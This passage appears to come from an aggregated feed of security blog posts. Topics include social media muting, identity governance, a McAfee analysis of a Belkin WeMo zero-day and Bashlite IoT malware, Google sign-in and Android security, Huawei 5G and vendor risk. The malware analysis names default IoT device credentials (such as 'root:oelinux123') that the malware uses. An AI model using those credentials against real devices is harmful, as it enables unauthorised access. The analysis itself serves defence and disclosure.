  • Mean, bullying, or reckless content
  • Posting too frequently
  • Excessive bragging, boasting, or self-promotion
  • Content that negatively impacts your mental health
  • Non-stop political posts or rants
  • Too many selfies
  • Graphic or disturbing images or videos
  • Constant negative or critical posts
  • Useless, uninteresting, or tedious information
  • Monopolizing conversations
  • Perpetual personal drama
  • Too much content on one topic

Talking points for families

Editing your social circle is okay. The voices that surround you have influence, so choose the voices you surround yourself with carefully. Also, being “friends” with 1,000 or even 300 people isn’t realistic or reflective of real life. Remind kids: That tug (or compulsion) you feel to like, comment, post, or chime in online should not rule your time or your mind. You (and your family) may be surprised how good it feels to whittle down the number of voices you allow into your day.

Pay attention to emotional triggers. In many ways, you are what you consume online. Ask yourself: Is this person’s account positive or negative? Does it make me feel included and worthy or excluded and less-than? Do I feel jealous, annoyed, or negative when I see this person’s updates, photos, or tweets? Edit boldly. You can mute negative accounts temporarily or permanently without guilt.

Less noise, less clutter. If you want things to be different, you have to do things differently, and this applies online. Forming your thoughts and opinions is much more difficult when you are constantly absorbing other people’s ideas. The less digital clutter, the more room for quiet contemplation and self-awareness, which is always a good idea for young and older minds alike.

Be brave, be you. Kids pay far more attention to friend and follower counts than adults do. They consider it intentional rejection when someone unfollows or unfriends them online. For that reason, you may need to reiterate the importance of putting mental health before popularity or people pleasing. Remind them: It’s okay to mute, unfollow, or unfriend any person who is not a positive influence on your heart and mind.

No one is everyone’s favorite. It’s impossible to like everyone or be liked by everyone — impossible. There will always be individuals who will get under your skin. And, at times, people may feel the same about you. This is a normal part of human relationships. This reality makes striving to be liked by everyone online an impossible, exhausting task.

The digital world is packed with ever-changing social complexities. Seemingly casual clicks can trigger an avalanche of positive or negative emotions that can take their toll (whether we realize it or not). Helping your child think proactively about content and take responsibility for the content that comes across his or her screen is more important than ever in raising wise, healthy digital kids.

The post The Mute Button: How to Use Your Most Underrated Social Superpower appeared first on McAfee Blogs.

Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series.

At Privacy Ref we are always thinking of ways to improve the experience of our followers and clients alike. Weekly on our YouTube channel you will find a relevant privacy topic being discussed in a 1-minute video such as:  Cookies walls and the Dutch DPA – Ben Siegel discusses his research on the Dutch Personal […]

The post Do you have 1 minute? Check out our New weekly Quick Privacy Ref-erence series. appeared first on Privacy Ref Blog.

Five Reasons You Need Identity Governance & Administration


Demands on organizations continue to intensify – the precarious balance of requests for more access with the need to be more secure is difficult to maintain. Additionally, all of this is to be achieved faster, with fewer resources. It is more important than ever for each organization to develop a strategy for managing and governing user access in an automated manner. A well-defined Identity Governance and Administration (IGA) program is becoming an increasingly critical piece of an organization’s security portfolio.

Small organizations with employees numbering in the double digits will be able to easily manage granting, removing, and reviewing access, and may even have predefined roles or access templates. Larger businesses, on the other hand, greatly benefit from implementing an IGA solution in order to effectively manage access to systems, applications, and devices. Read on to find out the many benefits of IGA and determine if it’s time for your organization to explore the world of IGA.

1. Regulatory Compliance

With regulations like the GDPR (General Data Protection Regulation), SOX (Sarbanes-Oxley), and HIPAA (Health Insurance Portability and Accountability Act) prioritizing and mandating data privacy, industries are focusing on access issues more than ever. Limiting and monitoring access to only those that need it is not only a crucial security measure, but one that is becoming critical to staying in compliance with these regulations.

IGA solutions not only help ensure that access to sensitive information like patient records or financial data is strictly controlled, they also enable organizations to prove they are taking these actions. Organizations can receive audit requests at any time. An effective IGA solution makes the required periodic review and attestation of access business friendly, effective, and comes with built-in reporting capabilities to meet relevant government and industry regulations. Taking a visual approach to the data can make this whole process more accurate and easier to deploy to the business.

2. Risk Management

The news cycle is dominated by stories of massive data breaches, with the organizations involved having to spend time and money on remediation efforts, while also dealing with the damage done to their reputation. IGA solutions take a proactive approach, reducing the exposure of sensitive data by rigorously limiting and guarding access to begin with, reducing the risk in the environment.

IGA solutions enable a robust approach to managing and governing access by focusing on three aspects of access. First, they practice the principle of least privilege, eliminating excess privileges and granting access to only those who absolutely need it in order to do their jobs. Secondly, they terminate ‘orphaned’ accounts as quickly as possible. These accounts that are no longer being used, either because an employee is no longer with the company, or for any other reason, are perfect targets for those looking to breach the environment. Finally, IGA solutions monitor for segregation of duty (SoD) violations. This critical risk management concept dictates that no single individual should be able to complete a sensitive task on their own, creating a built-in system of checks and balances. For example, in a financial transaction, whoever creates a payee should not be the one to authorize payment.
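Two of the three checks described above, orphaned-account detection and SoD monitoring over role-based assignments, as an added example rather than Core Security’s code. The HR roster, accounts, role-to-entitlement map and staleness threshold are constructed; the “create payee / authorize payment” toxic combination is the post’s own example.

```python
"""Orphaned-account and segregation-of-duty checks over RBAC assignments.

Added example, not Core Security's code. All sample data is constructed;
the create-payee / authorize-payment rule is the post's own SoD example.
"""
from datetime import date, timedelta

# Role Based Access Control: roles bundle entitlements (constructed).
ROLE_ENTITLEMENTS = {
    "ap_clerk": {"payee.create", "invoice.view"},
    "ap_manager": {"payment.authorize", "invoice.view"},
    "auditor": {"invoice.view", "ledger.read"},
}

# SoD rule: no single person may hold both sides of a payment.
TOXIC_COMBINATIONS = [
    ({"payee.create", "payment.authorize"}, "create payee + authorize payment"),
]


def effective_entitlements(roles):
    """Union of the entitlements granted through each assigned role."""
    ents = set()
    for role in roles:
        ents |= ROLE_ENTITLEMENTS.get(role, set())
    return ents


def find_sod_violations(accounts):
    """Return (user, rule) pairs where one account's roles span a toxic combination."""
    violations = []
    for acct in accounts:
        ents = effective_entitlements(acct["roles"])
        for combo, name in TOXIC_COMBINATIONS:
            if combo <= ents:  # every entitlement of the toxic pair is held
                violations.append((acct["user"], name))
    return violations


def find_orphaned_accounts(accounts, hr_active_users, today, stale_after_days=90):
    """Accounts whose owner is no longer active in HR, or that have gone unused."""
    orphans = []
    for acct in accounts:
        if acct["user"] not in hr_active_users:
            orphans.append((acct["user"], "owner not active in HR"))
        elif today - acct["last_login"] > timedelta(days=stale_after_days):
            orphans.append((acct["user"], "no login in %d days" % stale_after_days))
    return orphans


# Constructed sample data.
TODAY = date(2019, 4, 30)
HR_ACTIVE = {"alice", "bob", "carol"}
ACCOUNTS = [
    {"user": "alice", "roles": ["ap_clerk"], "last_login": date(2019, 4, 29)},
    {"user": "bob", "roles": ["ap_clerk", "ap_manager"], "last_login": date(2019, 4, 28)},  # SoD violation
    {"user": "carol", "roles": ["auditor"], "last_login": date(2018, 12, 1)},               # stale account
    {"user": "dave", "roles": ["ap_manager"], "last_login": date(2019, 4, 1)},              # left the company
]
```
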

3. Business Changes

Organizations grow and change continually, and an IGA solution can make those changes more efficient and less risky. Small changes, like individual promotions, transfers, and layoffs, can quickly be implemented, since IGA solutions can provision access based on roles, and not on individual accounts. This strategy of Role Based Access Control (RBAC) works equally well for larger changes, like mergers, acquisitions, and corporate reorganizations. IGA solutions can greatly shorten the timeline for executing bulk additions or transitions of user accounts by automating and streamlining provisioning and approvals.  It is critical to develop roles in an accurate and intuitive manner.

4. Streamlining Budget

We all need to do more with less. Managing identity and access manually can be an unsustainable burden on IT. Provisioning access manually takes far more time, and often comes with additional help desk calls or tickets if these changes take too long or are done incorrectly. Documentation and reporting requirements add more effort and complexity. Certifying privileged access also becomes time consuming for managers and can result in rubber-stamping approvals in order to get on with more pressing matters. Carelessness in any of these tasks can lead to costly mistakes.

Of course, this also means that IT teams are sacrificing time that could be spent on other projects or improvements. IGA solutions minimize these time management issues and can also accomplish these tasks with higher accuracy.

5. Service Delivery

At their core, IGA solutions are designed to make life easier. Their usefulness impacts everyone within an organization. Establishing roles and streamlining provisioning makes for a much more efficient on-boarding process. The inefficiencies of a new hire having to wait for access, sometimes for days or weeks, can be eliminated. Their accounts will be created with access already in place, based on their assigned role. Managers don’t have to waste time requesting access for employees, nor do they need to worry about making sure that former employees no longer have access. Ultimately, everyone will have the access they need when they need it, allowing everyone to get to work that much faster.

With these clear, measurable benefits, it’s easy to see why IGA solutions are quickly becoming an essential component in many organizations’ security strategy. Core Security, a HelpSystems Company, has developed multiple integrated IGA solutions to tailor fit your organization, since no two IT environments look alike. While these solutions have different approaches to IGA, they all provide these five critical benefits, and more. To find out which IGA solution is right for you, request a personalized demo from one of our experts today.


DevSecOps Podcast Episodes Recap

The week of April 15th I dedicated every Security In Five podcast episode to DevSecOps and the push to move security left. I was motivated to talk about this push because it’s a concept and challenge I deal with almost daily with my own projects and working with clients. DevSecOps, or DevOps if you are […]

The post DevSecOps Podcast Episodes Recap appeared first on Security In Five.

IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target?

Effective malware is typically developed with intention, targeting specific victims using either known or unknown vulnerabilities to achieve its primary functions. In this blog, we will explore a vulnerability submitted by McAfee Advanced Threat Research (ATR) and investigate a piece of malware that recently incorporated similar vulnerabilities. The takeaway from this blog is the increasing movement towards IoT-specific malware and the likelihood of this unique vulnerability being incorporated into future malware.

We are rapidly approaching the one-year mark for the date McAfee ATR disclosed to Belkin (a consumer electronics company) a critical, remote code execution vulnerability in the Belkin WeMo Insight smart plug.  The date was May 21st, 2018, and the disclosure included extensive details on the vulnerability (a buffer overflow), proof-of-concept, exploit code and even a video demo showing the impact, dropping into a root shell opened on the target device. We further blogged about how this device, once compromised, can be used to pivot to other devices inside the network, including smart TVs, surveillance cameras, and even fully patched non-IoT devices such as PCs. Initially, the vendor assured us they had a patch ready to go and would be rolling it out prior to our planned public disclosure. In January of 2019, Belkin patched a vulnerability in the Mr. Coffee Coffee Maker w/ WeMo, which McAfee ATR reported to Belkin on November 16th, 2018, and released publicly at Mobile World Congress in late February. We commend Belkin for an effective patch within the disclosure window, though we were somewhat surprised that this was the prioritized patch given the Mr. Coffee product with WeMo no longer appears to be produced or sold.

The Insight smart plug firmware update never materialized and, after attempts to try to communicate further, three months later, in accordance with our vulnerability disclosure policy, McAfee ATR disclosed the issue publicly on August 21st. Our hope is that vulnerability disclosures will encourage vendors to patch vulnerabilities, educate the security community on a vulnerable product to drive development of defenses and, ultimately, encourage developers to recognize the impact that insecure code development can have.

Fast forward nearly a year and, to the best of our knowledge, this vulnerability, classified as CVE-2018-6692, is still a zero-day vulnerability. As of April 10th, 2019, we have heard of plans for a patch towards the end of the month and are standing by to confirm. We intentionally did not release exploit code to the public, as we believe it tips the balance in favor of cyber criminals, but exploitation of this vulnerability, while challenging in some regards, is certainly straightforward for a determined attacker.

IoT-Specific Malware

Let’s focus now on why this vulnerability is enticing for malicious actors.  Recently, Trend Micro released a blog observing occasional in-the-wild detections for a malware known as Bashlite. This specific malware was recently updated to include IoT devices in its arsenal, specifically using a Metasploit module for a known vulnerability in the WeMo UPnP protocol. The vulnerability appears to be tied to a 2015 bug which was patched by Belkin and was used to fingerprint and exploit WeMo devices using the “SetSmartDevInfo” action and corresponding “SmartDevURL” argument.

We can say for certain that this Metasploit module is not targeting the same vulnerability submitted by McAfee ATR, which resides in the <EnergyPerUnitCostVersion> XML field, within the libUPnPHndlr.so library.

Analysis of Bashlite and IoT Device Targets

After briefly analyzing a few samples of the malware (file hashes from the aforementioned blog), the malware appears to check for default credentials and known vulnerabilities in multiple IoT devices. For example, I came across a tweet after finding a reference to the password “oelinux123” in the binary.

This IoT device is an Alcatel Mobile Wifi, which has a number of known/default passwords. Notice the top username/password combination of “root:oelinux123.” When we analyze the actual malware, we can observe the steps used to enumerate and scan for vulnerable devices.

Here is a reference from the popular binary disassembly tool IDA Pro showing the password “OELINUX123” used to access a mobile WiFi device.

The next image is a large “jump table” used to scan through and identify a range of devices or targets using known passwords or vulnerabilities.

Next is some output from the “Echobot” scanner employed by the malware used to report possible vulnerabilities in target devices from the above jump table.

The final screenshot shows a list of some of the hardcoded credentials used by the malware.

The “huigu309” password appears to be associated with Zhone and Alcatel Lucent routers. Both routers have had several known vulnerabilities, backdoors and hardcoded passwords built into the firmware.

There is no need to continue the analysis further, as the point here is not to analyze the Bashlite malware in depth, but it was worth briefly expanding on some of its capabilities to show that this malware is programmed to target multiple IoT devices.

Now to the point! The simple fact that generic WeMo Metasploit modules were added to this malware indicates that Belkin WeMo is an interesting enough target that an unpatched vulnerability would be compelling to add to the malware’s capabilities. Hence, we believe it is possible, perhaps even likely, that malware authors already have incorporated, or are currently working on incorporating, the unpatched WeMo Insight vulnerability into IoT malware. We will be closely following threats related to this zero-day and will update or add to this blog if malware embedding this vulnerability surfaces. If the vendor does produce an effective patch, it will be a step in the right direction to reduce the overall threat and the likelihood of the vulnerability being weaponized in malware.

How to Protect Your Devices

As this vulnerability requires network access to exploit the device, we highly recommend that users of IoT devices such as the WeMo Insight implement strong Wi-Fi passwords, and further isolate IoT devices from critical devices using VLANs or network segmentation. McAfee Secure Home Platform users can enable whitelisting or blacklisting features for protection from malicious botnets attempting to exploit this vulnerability.

Call to Action for Vendors, Consumers and Enterprise

It should be plain to see that there is some low-hanging fruit in securing IoT devices. While some of the obvious, simple issues such as hardcoded credentials are hard to explain, we understand that true software vulnerabilities cannot always be avoided. However, we issue a call to action for IoT vendors: these issues must be fixed, and quickly. Threat actors are constantly tracking flaws which they can weaponize, and we see a prime example of this in the Bashlite malware, updated for IoT devices including Belkin WeMo. By listening to consumers’ requests for security, partnering closely with researchers to identify flaws, and having a fast and flexible response model, vendors have a unique opportunity to close the holes in the products the world is increasingly relying on. Consumers can take away the importance of basic security hygiene: applying security updates when available, enforcing a complex password policy for home networks and devices, and isolating critical devices or networks from IoT. Enterprise readers should be aware that just because this is typically a consumer IoT device does not mean corporate assets cannot be compromised. Once a home network has been infiltrated, all devices on that same network should be considered at risk, including corporate laptops. This is a common method for cyber criminals to cross the boundary between home and enterprise.

The post IoT Zero-Days – Is Belkin WeMo Smart Plug the Next Malware Target? appeared first on McAfee Blogs.

Better protection against Man in the Middle phishing attacks



We’re constantly working to improve our phishing protections to keep your information secure. Last year, we announced that we would require JavaScript to be enabled in your browser when you sign in so that we can run a risk assessment whenever credentials are entered on a sign-in page and block the sign-in if we suspect an attack. This is yet another layer of protection on top of existing safeguards like Safe Browsing warnings, Gmail spam filters, and account sign-in challenges.

However, one form of phishing, known as “man in the middle” (MITM), is hard to detect when an embedded browser framework (e.g., Chromium Embedded Framework - CEF) or another automation platform is being used for authentication. MITM intercepts the communications between a user and Google in real-time to gather the user’s credentials (including the second factor in some cases) and sign in. Because we can’t differentiate between a legitimate sign in and a MITM attack on these platforms, we will be blocking sign-ins from embedded browser frameworks starting in June. This is similar to the restriction on webview sign-ins announced in April 2016.

What developers need to know

The solution for developers currently using CEF for authentication is the same: browser-based OAuth authentication. Aside from being secure, it also enables users to see the full URL of the page where they are entering their credentials, reinforcing good anti-phishing practices. If you are a developer with an app that requires access to Google Account data, switch to using browser-based OAuth authentication today.
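Browser-based OAuth for a desktop app means handing the sign-in page to the system browser and receiving the authorization code back on a loopback redirect, with PKCE binding the code to the app that started the flow. The following Python is an added example and is not Google's own code; it uses Google's documented authorization endpoint, but `CLIENT_ID` is a placeholder for the desktop-app client ID issued in Google Cloud Console, and the `openid email` scope is only an assumption for illustration. After the flow completes, the code and verifier are exchanged at the token endpoint (https://oauth2.googleapis.com/token), which the block leaves to the caller.

```python
import base64
import hashlib
import secrets
import urllib.parse
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer

# Google's OAuth 2.0 authorization endpoint (real, documented).
GOOGLE_AUTH_ENDPOINT = "https://accounts.google.com/o/oauth2/v2/auth"
# Placeholder (assumption): substitute the desktop-app client ID from Google Cloud Console.
CLIENT_ID = "YOUR_CLIENT_ID.apps.googleusercontent.com"


def make_code_verifier(nbytes=32):
    """PKCE code_verifier: 43 URL-safe characters derived from CSPRNG bytes (RFC 7636)."""
    return base64.urlsafe_b64encode(secrets.token_bytes(nbytes)).rstrip(b"=").decode("ascii")


def code_challenge(verifier):
    """S256 challenge: BASE64URL(SHA256(verifier)) without padding (RFC 7636 section 4.2)."""
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode("ascii")


def build_auth_url(client_id, redirect_uri, scope, state, verifier):
    """Authorization URL the system browser is sent to; the user sees the full URL."""
    params = {
        "client_id": client_id,
        "redirect_uri": redirect_uri,
        "response_type": "code",
        "scope": scope,
        "state": state,
        "code_challenge": code_challenge(verifier),
        "code_challenge_method": "S256",
    }
    return GOOGLE_AUTH_ENDPOINT + "?" + urllib.parse.urlencode(params)


def parse_redirect(path, expected_state):
    """Extract the authorization code from the loopback redirect; None if state mismatches or error."""
    fields = urllib.parse.parse_qs(urllib.parse.urlparse(path).query)
    if fields.get("state", [None])[0] != expected_state:
        return None  # ignore responses this app did not initiate (CSRF / mix-up protection)
    if "error" in fields:
        return None
    codes = fields.get("code")
    return codes[0] if codes else None


class _RedirectHandler(BaseHTTPRequestHandler):
    """Handles the single loopback redirect and stores the result on the server object."""

    def do_GET(self):
        self.server.auth_code = parse_redirect(self.path, self.server.expected_state)
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"Sign-in complete. You may close this window.")

    def log_message(self, *args):
        pass  # keep the console quiet


def browser_login(client_id=CLIENT_ID, scope="openid email"):
    """RFC 8252 flow: ephemeral loopback listener plus system browser; returns (code, verifier)."""
    server = HTTPServer(("127.0.0.1", 0), _RedirectHandler)  # port 0 = OS-chosen port
    server.expected_state = secrets.token_urlsafe(16)
    server.auth_code = None
    redirect_uri = f"http://127.0.0.1:{server.server_port}/"
    verifier = make_code_verifier()
    webbrowser.open(build_auth_url(client_id, redirect_uri, scope, server.expected_state, verifier))
    server.handle_request()  # block until exactly one redirect arrives
    server.server_close()
    return server.auth_code, verifier


if __name__ == "__main__":
    code, verifier = browser_login()
    print("authorization code received:", code is not None)
```

Because the credentials are typed into the real browser rather than an embedded view, Google's risk assessment runs normally and the user can read the page's URL; the `state` check and the PKCE verifier mean that even a code intercepted on the loopback cannot be redeemed by another process.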

The Android Platform Security Model



Each Android release comes with great new security and privacy features. When it comes to implementing these new features we always look at ways to measure the impact with data that demonstrates the effectiveness of these improvements. But how do these features map to an overall strategy?
Last week, we released a whitepaper describing The Android Platform Security Model. Specifically we discuss:
  • The security model which has implicitly informed the Android platform’s security design from the beginning, but has not been formally published or described outside of Google.
  • The context in which this security model must operate, including the scale of the Android ecosystem and its many form factors and use cases.
  • The complex threat model Android must address.
  • How Android’s reference implementation in the Android Open Source Project (AOSP) enacts the security model.
  • How Android’s security systems have evolved over time to address the threat model.
Android is fundamentally based on a multi-party consent[1] model: an action should only happen if the involved parties consent to it. Most importantly, apps are not considered to be fully authorized agents for the user. There are some intentional deviations from the security model and we discuss why these exist and the value that they provide to users. Finally, openness is a fundamental value in Android: from how we develop and publish in open source, to the open access users and developers have in finding or publishing apps, and the open communication mechanisms we provide for inter-app interactions which facilitate innovation within the app ecosystem.
We hope this paper provides useful information and background to all the academic and security researchers dedicated to further strengthening the security of the Android ecosystem. Happy reading!
Acknowledgements: This post leveraged contributions from René Mayrhofer, Chad Brubaker, and Nick Kralevich.

Notes


  1. The term ‘consent’ here and in the paper is used to refer to various technical methods of declaring or enforcing a party’s intent, rather than the legal requirement or standard found in many privacy legal regimes around the world. 

Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program

McAfee has a rich history in helping to shape the industry’s response to the ever-changing threat landscape.  We started as a pioneer in cybersecurity over three decades ago. Today, we are the device to cloud cybersecurity market leader, supporting consumers from small and large enterprises to governments.

But we don’t do this on our own. And in order for us to be successful in our mission to make the digital world more secure, we need to have the right people in place.

One of the largest challenges facing the cybersecurity industry today is the lack of skilled personnel and the global talent shortage. Current research indicates that our industry will face more than 1.5 million unfilled cybersecurity positions by 2025.

This talent shortage, coupled with the increasing volume of threats and the changing cybercriminal landscape, presents a problem which is only getting worse. And not just for us, but the whole industry. Therefore, we must, as a group, collectively improve upon this talent shortage.

So how will we do this?

One step that McAfee is investing heavily in is education. We are already doing a lot of work to support students and inspire them to take on careers in cybersecurity, for example our work in the UK with high school programs run at the home of the World War II code breakers Bletchley Park.

Now we’re delighted to be expanding this work even further as a founding partner of the new Master of Cybersecurity and Threat Intelligence at the University of Guelph, which will launch in September this year. This graduate degree will train the next generation on how to stop cyberattacks before they happen, and give students expertise in threat intelligence, threat hunting, digital forensics, intrusion prevention, privacy, cryptanalysis and more.

During the course, students will work with state-of-the-art cybersecurity tools in an isolated lab where they can run real-world attacks, engaging directly with active adversaries and learning their tactics, techniques and procedures to build state-of-the-art cyber defense and detection systems. They will learn the intricacies of how attacks are conducted and methods for preventing further intrusions. McAfee has already been involved with the development of the lab, ensuring it replicates our real-world labs to give students the right experience from the very beginning.

But we’re not just supporting the lab. Alongside partners including Cisco and BlackBerry, we’re also going to be showing up throughout the course and inviting students to work closely with us inside McAfee to build the skills they need for a future career in cybersecurity.

As a Canadian, I am particularly proud that a Canadian institution is showing this level of innovation which will enhance not only our local talent pool but will also help solve the global talent shortage.

To learn more, and apply to be one of the founding class, visit the University of Guelph here.

The post Why McAfee is Supporting the University of Guelph’s New Cyber Security and Threat Intelligence Degree Program appeared first on McAfee Blogs.

Top Cybersecurity Concerns with Huawei 5G Dominance

The Internet of Things (IoT) is creating a need to advance cellular capabilities to support the 14 billion IoT devices currently connected globally, a number growing to between 20 and 50 billion devices by 2020 (Gartner and Cisco). This includes current mobile devices, computers, smart speakers and televisions, and will include more items like digital locks, security cameras, vehicles, and household appliances. The IPv4 address space is now scarce, and the Internet Engineering Task Force (IETF) ratified IPv6 as an Internet Standard in July 2017. The growth of connected devices requires a larger IP addressing scheme and network infrastructure that supports the connectivity of billions of devices at high speeds.

The next iteration of robust infrastructure is 5G, providing bandwidth of up to 20 gigabits per second. Deployment begins this year, but a complete transition will take many years; Huawei, a Chinese corporation, currently leads in the technology. Huawei is the second largest provider of cellular phones worldwide and the largest manufacturer of network equipment.

The U.S. Government has taken a decided stance to block the use of Huawei in the United States, filing a complaint that bans all government agencies from engaging in purchasing from Huawei and bars third parties who use the company’s equipment (BBC). Huawei is currently suing the United States because of the ban. The U.S. is not the only country taking a cautious stance with Huawei, however. They’re joined by Germany, Great Britain, Australia, Canada, and Japan, all of which are citing major security concerns with the company (MIT Technology Review).

Security Concerns with Huawei dominating the 5G space:

1.  Security Vulnerabilities in Reconfiguring Networks

The first concern is that newer 5G network equipment is almost entirely software and constantly reconfigures, challenging security agencies, who examine equipment and software for vulnerabilities and security flaws or backdoors (FreshAir). When an organization is unable to identify weaknesses in devices with constantly changing software, it becomes impossible to implement security controls to limit vulnerabilities to an acceptable level, making an organization’s or state’s data accessible.

2.  Espionage & Interference

The second concern is the possibility of China using Huawei to conduct espionage or disrupt communications. A seven-month investigation into China’s Intellectual Property (IP) theft, led by the United States Trade Representative, estimates Chinese theft of American IP has cost the U.S. between $225 billion to $600 billion annually (CNN).

China has also used the Internet to enable rampant government oppression within their borders and is now focusing on other countries and foreign businesses. China is blocking and changing data, both coming into the country and going out of the country, using what Weaver, a network security expert at the International Computer Science Institute, has coined the Great Cannon (MIT Technology Review).

It is also concerning that China will likely continue to use the Internet to control narratives, as they did when Marriott listed Tibet and Hong Kong as separate countries from China, forcing an apology from the hotel chain. Chinese officials are also going after other companies that “misidentify” Taiwan (MIT Technology Review).

3.  Foreign Nation-State Controlled Networks

The third concern, and biggest security concern for the United States, is the vastness of a network controlled by a foreign company and potentially adversarial government. As Sanger (2019) reports, “classified intelligence reports from the U.S. have warned that China would one day use Huawei to penetrate American networks for cyber-espionage or cyberattacks.” Chinese private industry and the State are tightly tied with companies being answerable to the government. Current Chinese laws state that any Chinese telecom companies would have to participate in Chinese intelligence operations (BBC).

If Huawei controls the 5G network infrastructure, the company and the Chinese government have a tremendous advantage to collect, disseminate, and control data and critical infrastructure. With IoT expanding the attack surface it is important for countries and companies to advance their security.

Because of the persistent threat environment, companies require an adaptive security program.  Hiring a Managed Security Service Provider (MSSP) to implement a security solution would help U.S. companies prepare for current and future threats by monitoring, analyzing, encrypting, and assisting in security strategies against adversarial entities.

The post Top Cybersecurity Concerns with Huawei 5G Dominance appeared first on GRA Quantum.

Employees Share Stories Working in Award–Winning Cork Office

“The culture at McAfee is easy going, fun, dynamic and everyone is friendly.”—Deirdre, Project Manager

The McAfee office in Cork was once again named among companies recognized in Ireland’s Great Place to Work awards. Our Cork location has much to offer—from a supportive working environment to career growth opportunities, the opportunities are abundant.

Hear from three McAfee employees, Deirdre, Ranjit and Oliver, as they share their personal stories of working in the Cork, Ireland office.

Want to join in on the fun? We’re hiring in Cork! Apply now.

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about.

The post Employees Share Stories Working in Award–Winning Cork Office appeared first on McAfee Blogs.

Federal, State Cyber Resiliency Requires Action

It is no shock that our state and local infrastructures are some of the most sought-after targets for foreign and malicious cyber attackers, but the real surprise lies in the lack of preventive measures that are able to curb them. Major attention has been drawn to the critical gaps that exist as a result of an ever-expanding attack surface, making old system architectures an increasing liability.

Recently, the city of Albany, New York became a victim of a ruthless ransomware attack, which created a series of municipal service interruptions. Residents weren’t able to use the city’s services to obtain birth certificates, death certificates or marriage licenses, and the police department’s networks were rendered inoperable for an entire day. This resulted in an enormous disruption of the city’s functionality and made clear that the threat to infrastructure is more real than ever. Bolstering state and local digital defenses should be of the utmost priority, especially as we near the 2020 presidential elections when further attacks on election infrastructure are expected. We must take the necessary precautions to mitigate cyberattack risk.

The reintroduction of the State Cyber Resiliency Act by Senators Mark Warner (D-VA) and Cory Gardner (R-CO), and Representatives Derek Kilmer (D-WA) and Michael McCaul (R-TX), does just that. The legislation demonstrates a critical bipartisan effort to ensure that state, local and tribal governments have a robust capacity to strengthen their defenses against cybersecurity threats and vulnerabilities through the Department of Homeland Security (DHS). States have made clear that they suffer from inadequate resources to deal with increasingly sophisticated attacks, but also the most basic attacks, which require proper safeguards and baseline protection. This bill works to strategically address the challenges posed by a lack of resources to deal with emerging threats.

The possibility of cyber warfare must not be taken lightly and has long gone ignored. This bill shows that the status quo of kicking the can further down the road will no longer stand as a “strategy” in today’s political and cybersecurity landscape. Action is necessary to better secure our national security and the systems upon which every sector of our economy relies, from utilities to banking to emergency first responders to hospital networks to election infrastructure. It is our responsibility to create and support the safeguards against bad actors looking for gaps in our infrastructure.

The bill makes states eligible for grants to implement comprehensive, flexible cybersecurity plans that address continuous vulnerability monitoring, protection for critical infrastructure systems and a resilient cybersecurity workforce. States would also be able to repurpose funds to various local and tribal governments. In addition, the bill would implement a 15-person committee to review the proposed plans and track the spending of state and local governments. This committee would help states and localities formulate and deliver annual reports to Congress that detail the program’s progress. The specific funding was not disclosed, but this effort showcases the timeliness of the issue and why it is such an imperative step at this stage in time.

We must take basic steps to ensure the security of our state and local systems, and enable systems to be patched, maintained and protected from outside threats. This bill is a welcome and needed effort by lawmakers to address the existing challenges that states, local governments and infrastructures are dealing with every day. As adversaries become increasingly sophisticated and targeted in their attack strategies, we have a responsibility to equip states and localities with the necessary tools to close and mitigate gaps.

We at McAfee are committed to partnering with federal, state and local governments to equip them with the best strategies to create a better and more secure cybersecurity future.

The post Federal, State Cyber Resiliency Requires Action appeared first on McAfee Blogs.

Third Party Security Risks to Consider and Manage

Guest article by Josh Lefkowitz, CEO of Flashpoint
 
Acceptable business risks must be managed, and none more so than those associated with external vendors, who often have intimate access to infrastructure or business data. As we’ve seen with numerous breaches where attackers were able to leverage a weakness in a contractor or service provider, third-party risk must be assessed and mitigated during the early stages of such a partnership, as well as throughout the relationship.
 
The following tips can help security decision makers more effectively address the risks posed by relationships with technology vendors.
 
Do Your Homework
Conducting thorough due diligence on a prospective vendor is essential. Organisations could evaluate technical and regulatory risk through due diligence questionnaires, for example, or even on-site visits if necessary. The point is to evaluate not only a third party’s information security risk, but also its compliance with regulations such as GDPR for privacy and PCI DSS for payment card security. An organisation may also want to evaluate a third party’s adherence to industry standards such as NIST or ISO in certain security- and privacy-related areas.
 
Next, consider what this compliance information doesn’t tell you. What do you still need to learn about the vendor’s security posture before deciding whether you’re comfortable with it? Think about what questions you still have and, if possible, seek answers from the vendor’s appropriate security contact. Here are some questions to pose:
  • When was your last penetration test? Is your remediation on schedule?
  • Have you documented security incidents? How did you remediate those incidents?
  • Do you have the result of your last business continuity test? If yes, can you share it?
  • What security controls exist for your users? Do they use multifactor authentication, etc.?
  • How are you maturing your security program?
  • Are you ISO, SOC 1/SOC 2, and NIST compliant, and is there documentation to support this?
Additional Security: It’s All in the Controls
If you’re unsatisfied with the answers from a potential partner regarding their security, it’s OK to walk away, especially if you make the determination that working with the vendor may not be critical to your business.  

That’s not always the case, however. If you must partner with a particular third party and if no other reputable vendors offer anything comparable, you will likely need to implement additional technical and/or policy controls to mitigate the security risks associated with your business’s use of the offering, such as:
 
Technical
These are typically restrictions on the access and/or technical integrations of vendor offerings. For example, if a product is web-based but unencrypted, consider blocking users on your network from accessing its website; provided the proper authentication is in place, use its API instead. In most cases, there are two options, remediation or compensating controls:
  • Remediation: Can you work with the vendor to remediate the technical risk?
  • Compensating controls: If you cannot remediate the risks entirely, can you establish technical compensating controls to minimise or deflect the risk?
Policy
These are policies that users of the offering should follow, such as limits on the types and amounts of data that can be input securely. Some typical policy scenarios include:
  • Regulatory compliance: For example, a vendor’s non-compliance could mandate you walk away from a third-party relationship.
  • Contractual obligations: Are there contractual obligations in place with your existing clients that prevent you from working with vendors who don’t meet certain security and privacy standards?
  • Security best practices: Ensure your policies around risk are enforced and determine whether they may conflict with your vendors’ policies.
Asset Inventory is a Must
There are several reasons why it’s imperative to know which of your business’s assets the vendor will be able to store and/or access. For one, this knowledge can help identify and shape any additional security controls. Second, having this knowledge on hand is crucial should the vendor suffer a breach. Knowing exactly what assets were impacted, as well as who is doing what with your inventory, can expedite your response and identify and mitigate any exposure efficiently and effectively.
 
Response Plans Must Include Partners
